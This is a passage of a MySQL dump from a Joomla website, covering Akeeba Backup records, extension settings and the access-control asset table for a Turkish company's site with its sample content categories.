05:52:45','complete','backend','full',1,'site-www.3s-technologies.com.tr-20190916-084846.jpa','/home/ledbazaa/public_html/3s-technologies.com.tr/joomla/administrator/components/com_akeeba/backup/site-www.3s-technologies.com.tr-20190916-084846.jpa',0,'backend','id4',1,NULL,59469965,0,0),(5,'Backup taken on Saturday, 21 November 2020 06:13','','2020-11-21 03:13:40',NULL,'fail','backend','full',1,'site-www.3s-technologies.com.tr-20201121-091340-yab8yAquAOTDMtye.jpa','/home/ledbazaa/public_html/3s-technologies.com.tr/joomla/administrator/components/com_akeeba/backup/site-www.3s-technologies.com.tr-20201121-091340-yab8yAquAOTDMtye.jpa',0,'backend','5',1,'',446030629,0,0),(6,'Backup taken on Saturday, 21 November 2020 06:31','','2020-11-21 03:31:50','2020-11-21 04:06:30','complete','backend','full',1,'site-www.3s-technologies.com.tr-20201121-093150-8qk6YuB5MEKYGSSf.jpa','/home/ledbazaa/public_html/3s-technologies.com.tr/joomla/administrator/components/com_akeeba/backup/site-www.3s-technologies.com.tr-20201121-093150-8qk6YuB5MEKYGSSf.jpa',0,'backend','6',1,NULL,971577621,0,0),(7,'Backup taken on Çarşamba, 25 Kasım 2020 18:25 MSK','','2020-11-25 12:26:14','2020-11-25 13:00:44','complete','backend','full',1,'site-www.3s-technologies.com.tr-20201125-182614-LuawONcpCw0CRWgI.jpa','/home/ledbazaa/public_html/3s-technologies.com.tr/joomla/administrator/components/com_akeeba/backup/site-www.3s-technologies.com.tr-20201125-182614-LuawONcpCw0CRWgI.jpa',0,'backend','7',1,NULL,975798364,0,1);
/*!40000 ALTER TABLE `fz6t4_ak_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_ak_storage`
--

DROP TABLE IF EXISTS `fz6t4_ak_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_ak_storage` (
  `tag` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `lastupdate` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `data` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`tag`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_ak_storage`
--

LOCK TABLES `fz6t4_ak_storage` WRITE;
/*!40000 ALTER TABLE `fz6t4_ak_storage` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_ak_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_akeeba_common`
--

DROP TABLE IF EXISTS `fz6t4_akeeba_common`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_akeeba_common` (
  `key` varchar(190) CHARACTER SET utf8mb3 COLLATE utf8mb3_unicode_ci NOT NULL,
  `value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`key`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_akeeba_common`
--

LOCK TABLES `fz6t4_akeeba_common` WRITE;
/*!40000 ALTER TABLE `fz6t4_akeeba_common` DISABLE KEYS */;
INSERT INTO `fz6t4_akeeba_common` VALUES ('stats_siteurl','bb325a966678e00d87935a97fafab15a'),('stats_siteid','4267a61f4bff2ff26591364da56665fc228f1d9c'),('stats_lastrun','1728281665'),('fof30','[]'),('file_fef','[\"com_akeeba\",\"com_admintools\"]'),('fof40','{\"0\":\"com_admintools\",\"1\":\"plg_system_admintools\",\"2\":\"plg_actionlog_admintools\",\"3\":\"com_akeeba\",\"5\":\"plg_quickicon_akeebabackup\",\"6\":\"plg_system_backuponupdate\",\"7\":\"plg_actionlog_akeebabackup\",\"8\":\"plg_system_akversioncheck\"}');
/*!40000 ALTER TABLE `fz6t4_akeeba_common` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_assets`
--

DROP TABLE IF EXISTS `fz6t4_assets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_assets` (
  `id` int unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `parent_id` int NOT NULL DEFAULT '0' COMMENT 'Nested set parent.',
  `lft` int NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `level` int unsigned NOT NULL COMMENT 'The cached level in the nested tree.',
  `name` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The unique name for the asset.\n',
  `title` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The descriptive title for the asset.',
  `rules` varchar(5120) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded access control.',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_asset_name` (`name`),
  KEY `idx_lft_rgt` (`lft`,`rgt`),
  KEY `idx_parent_id` (`parent_id`)
) ENGINE=MyISAM AUTO_INCREMENT=243 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_assets`
--

LOCK TABLES `fz6t4_assets` WRITE;
/*!40000 ALTER TABLE `fz6t4_assets` DISABLE KEYS */;
INSERT INTO `fz6t4_assets` VALUES (1,0,1,562,0,'root.1','Root Asset','{\"core.login.site\":{\"6\":1,\"2\":1},\"core.login.admin\":{\"6\":1},\"core.login.offline\":[],\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(2,1,2,3,1,'com_admin','com_admin','{}'),(3,1,4,11,1,'com_banners','com_banners','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(4,1,12,13,1,'com_cache','com_cache','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(5,1,14,15,1,'com_checkin','com_checkin','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(6,1,16,17,1,'com_config','com_config','{}'),(7,1,18,91,1,'com_contact','com_contact','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(8,1,92,381,1,'com_content','com_content','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(9,1,382,383,1,'com_cpanel','com_cpanel','{}'),(10,1,384,385,1,'com_installer','com_installer','{\"core.admin\":[],\"core.manage\":{\"7\":0},\"core.delete\":{\"7\":0},\"core.edit.state\":{\"7\":0}}'),(11,1,386,387,1,'com_languages','com_languages','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(12,1,388,389,1,'com_login','com_login','{}'),(13,1,390,391,1,'com_mailto','com_mailto','{}'),(14,1,392,393,1,'com_massmail','com_massmail','{}'),(15,1,394,395,1,'com_media','com_media','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":{\"5\":1},\"core.edit\":[],\"core.edit.state\":[]}'),(16,1,396,399,1,'com_menus','com_menus','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(17,1,37,38,1,'com_messages','com_messages','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(18,1,402,423,1,'com_modules','com_modules','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(19,1,424,431,1,'com_newsfeeds','com_newsfeeds','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(20,1,432,433,1,'com_plugins','com_plugins','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(21,1,434,435,1,'com_redirect','com_redirect','{\"core.admin\":{\"7\":1},\"core.manage\":[]}'),(22,1,436,437,1,'com_search','com_search','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(23,1,438,439,1,'com_templates','com_templates','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(24,1,440,443,1,'com_users','com_users','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(25,1,444,461,1,'com_weblinks','com_weblinks','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1,\"10\":0,\"12\":0},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1}}'),(26,1,462,463,1,'com_wrapper','com_wrapper','{}'),(33,1,524,525,1,'com_finder','com_finder','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(34,8,109,114,2,'com_content.category.9','Uncategorised','{\"core.create\":{\"10\":0,\"12\":0},\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(35,3,7,8,2,'com_banners.category.10','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(36,7,23,24,2,'com_contact.category.11','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(37,19,427,428,2,'com_newsfeeds.category.12','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(38,25,451,452,2,'com_weblinks.category.13','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(39,8,115,310,2,'com_content.category.14','Sample Data-Articles','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(40,3,9,10,2,'com_banners.category.15','Sample Data-Banners','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(41,7,25,86,2,'com_contact.category.16','Sample Data-Contact','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(42,19,429,430,2,'com_newsfeeds.category.17','Sample Data-Newsfeeds','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(43,25,453,460,2,'com_weblinks.category.18','Sample Data-Weblinks','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(44,39,116,253,3,'com_content.category.19','Joomla!','{\"core.create\":{\"10\":0,\"12\":0},\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(45,44,117,230,4,'com_content.category.20','Extensions','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(46,45,118,133,5,'com_content.category.21','Components','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(47,45,134,195,5,'com_content.category.22','Modules','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(48,45,196,207,5,'com_content.category.23','Templates','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(49,45,208,209,5,'com_content.category.24','Languages','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(50,45,210,229,5,'com_content.category.25','Plugins','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(51,39,254,285,3,'com_content.category.26','Park Site','{\"core.create\":{\"10\":0,\"12\":0},\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(52,51,255,260,4,'com_content.category.27','Park Blog','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(53,51,261,282,4,'com_content.category.28','Photo Gallery','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(54,39,286,299,3,'com_content.category.29','Fruit Shop Site','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(55,54,287,292,4,'com_content.category.30','Growers','{\"core.create\":{\"12\":0},\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":{\"10\":1}}'),(56,43,454,455,3,'com_weblinks.category.31','Park Links','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(57,43,456,459,3,'com_weblinks.category.32','Joomla! Specific Links','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(58,57,457,458,4,'com_weblinks.category.33','Other Resources','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(59,41,26,27,3,'com_contact.category.34','Park Site','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(60,41,28,85,3,'com_contact.category.35','Shop Site','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(61,60,29,30,4,'com_contact.category.36','Staff','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(62,60,31,84,4,'com_contact.category.37','Fruit Encyclopedia','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(63,62,32,33,5,'com_contact.category.38','A','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(64,62,34,35,5,'com_contact.category.39','B','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(65,62,36,37,5,'com_contact.category.40','C','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(66,62,38,39,5,'com_contact.category.41','D','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(67,62,40,41,5,'com_contact.category.42','E','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(68,62,42,43,5,'com_contact.category.43','F','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(69,62,44,45,5,'com_contact.category.44','G','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(70,62,46,47,5,'com_contact.category.45','H','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(71,62,48,49,5,'com_contact.category.46','I','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(72,62,50,51,5,'com_contact.category.47','J','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(73,62,52,53,5,'com_contact.category.48','K','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(74,62,54,55,5,'com_contact.category.49','L','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(75,62,56,57,5,'com_contact.category.50','M','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(76,62,58,59,5,'com_contact.category.51','N','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(77,62,60,61,5,'com_contact.category.52','O','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(78,62,62,63,5,'com_contact.category.53','P','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(79,62,64,65,5,'com_contact.category.54','Q','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(80,62,66,67,5,'com_contact.category.55','R','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(81,62,68,69,5,'com_contact.category.56','S','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(82,62,70,71,5,'com_contact.category.57','T','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(83,62,72,73,5,'com_contact.category.58','U','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(84,62,74,75,5,'com_contact.category.59','V','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(85,62,76,77,5,'com_contact.category.60','W','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(86,62,78,79,5,'com_contact.category.61','X','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(87,62,80,81,5,'com_contact.category.62','Y','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(88,62,82,83,5,'com_contact.category.63','Z','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(89,46,119,120,6,'com_content.article.1','Administrator Components','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(90,93,136,137,7,'com_content.article.2','Archive Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(91,93,138,139,7,'com_content.article.3','Article Categories Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(92,93,140,141,7,'com_content.article.4','Articles Category Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(93,47,135,150,6,'com_content.category.64','Content Modules','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(94,47,151,158,6,'com_content.category.65','User Modules','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(95,47,159,172,6,'com_content.category.66','Display Modules','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(96,47,173,186,6,'com_content.category.67','Utility Modules','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(97,48,197,198,6,'com_content.category.68','Atomic','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(98,48,199,200,6,'com_content.category.69','Beez 20','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(99,48,201,202,6,'com_content.category.70','Beez5','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(100,48,203,204,6,'com_content.category.71','Milky Way','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(101,50,211,212,6,'com_content.article.5','Authentication','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(102,51,283,284,4,'com_content.article.6','Australian Parks ','{\"core.delete\":[],\"core.edit\":{\"2\":1},\"core.edit.state\":[]}'),(103,95,160,161,7,'com_content.article.7','Banner Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(104,44,231,232,4,'com_content.article.8','Beginners','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(105,46,121,122,6,'com_content.article.9','Contact','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(106,46,123,124,6,'com_content.article.10','Content','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(107,109,273,274,6,'com_content.article.11','Cradle Mountain','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(108,53,262,271,5,'com_content.category.72','Animals','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(109,53,272,281,5,'com_content.category.73','Scenery','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(110,95,162,163,7,'com_content.article.12','Custom HTML Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(111,54,293,294,4,'com_content.article.13','Directions','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(112,50,213,214,6,'com_content.article.14','Editors','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(113,50,215,216,6,'com_content.article.15','Editors-xtd','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(114,95,164,165,7,'com_content.article.16','Feed Display','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(115,52,256,257,5,'com_content.article.17','First Blog Post','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(116,52,258,259,5,'com_content.article.18','Second Blog Post','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(117,95,166,167,7,'com_content.article.19','Footer Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(118,54,295,296,4,'com_content.article.20','Fruit Shop','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(119,44,233,234,4,'com_content.article.21','Getting Help','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(120,44,235,236,4,'com_content.article.22','Getting Started','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(121,55,288,289,5,'com_content.article.23','Happy Orange Orchard','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(122,44,237,238,4,'com_content.article.24','Joomla!','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(123,108,263,264,6,'com_content.article.25','Koala','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(124,96,174,175,7,'com_content.article.26','Language Switcher','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(125,93,142,143,7,'com_content.article.27','Latest Articles Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(126,94,152,153,7,'com_content.article.28','Login Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(127,166,190,191,7,'com_content.article.29','Menu Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(128,93,144,145,7,'com_content.article.30','Most Read Content','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(129,93,146,147,7,'com_content.article.31','News Flash','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(130,44,239,240,4,'com_content.article.32','Parameters','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(131,108,265,266,6,'com_content.article.33','Phyllopteryx','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(132,109,275,276,6,'com_content.article.34','Pinnacles','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(133,44,241,242,4,'com_content.article.35','Professionals','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(134,95,168,169,7,'com_content.article.36','Random Image Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(135,93,148,149,7,'com_content.article.37','Related Items Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(136,44,243,244,4,'com_content.article.38','Sample Sites','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(137,46,125,126,6,'com_content.article.39','Search','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(138,96,176,177,7,'com_content.article.40','Search Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(139,50,217,218,6,'com_content.article.41','Search ','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(140,39,300,301,3,'com_content.article.42','Site Map','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(141,108,267,268,6,'com_content.article.43','Spotted Quoll','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(142,96,178,179,7,'com_content.article.44','Statistics Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(143,96,180,181,7,'com_content.article.45','Syndicate Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(144,50,219,220,6,'com_content.article.46','System','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(145,44,245,246,4,'com_content.article.47','The Joomla! Community','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(146,44,247,248,4,'com_content.article.48','The Joomla! Project','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(147,48,205,206,6,'com_content.article.49','Typography','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(148,44,249,250,4,'com_content.article.50','Upgraders','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(149,50,221,222,6,'com_content.article.51','User','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(150,46,127,128,6,'com_content.article.52','Users','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(151,44,251,252,4,'com_content.article.53','Using Joomla!','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(152,46,129,130,6,'com_content.article.54','Weblinks','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(153,95,170,171,7,'com_content.article.55','Weblinks Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(154,94,154,155,7,'com_content.article.56','Who\'s Online','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(155,108,269,270,6,'com_content.article.57','Wobbegone','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(156,55,290,291,5,'com_content.article.58','Wonderful Watermelon','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(157,96,182,183,7,'com_content.article.59','Wrapper Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(158,46,131,132,6,'com_content.article.60','News Feeds','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(159,166,192,193,7,'com_content.article.61','Breadcrumbs Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(160,50,223,224,6,'com_content.article.62','Content','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(162,109,277,278,6,'com_content.article.64','Blue Mountain Rain Forest','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(163,109,279,280,6,'com_content.article.65','Ormiston Pound','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(165,94,156,157,7,'com_content.article.66','Latest Users Module','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(166,47,189,194,6,'com_content.category.75','Navigation Modules','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(167,54,297,298,4,'com_content.category.76','Recipes','{\"core.create\":{\"12\":1,\"10\":1},\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":{\"12\":1,\"10\":1}}'),(168,34,110,111,3,'com_content.article.67','What\'s New in 1.5?','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(169,24,441,442,2,'com_users.category.77','Uncategorised',''),(170,50,225,226,6,'com_content.article.68','Captcha','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(171,50,227,228,6,'com_content.article.69','Quick Icons','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(172,96,184,185,7,'com_content.article.70','Smart Search','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(173,1,526,527,1,'com_joomlaupdate','com_joomlaupdate','{\"core.admin\":[],\"core.manage\":[],\"core.delete\":[],\"core.edit.state\":[]}'),(174,1,528,529,1,'com_virtuemart','virtuemart','{}'),(175,1,530,531,1,'com_virtuemart_allinone','virtuemart_allinone','{}'),(176,1,532,533,1,'com_akeeba','akeeba','{}'),(177,8,311,334,2,'com_content.category.78','Turkish (TR)','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(178,8,335,356,2,'com_content.category.79','English (UK)','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(179,177,312,333,3,'com_content.category.80','Turkish Content','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(180,178,336,351,3,'com_content.category.81','English 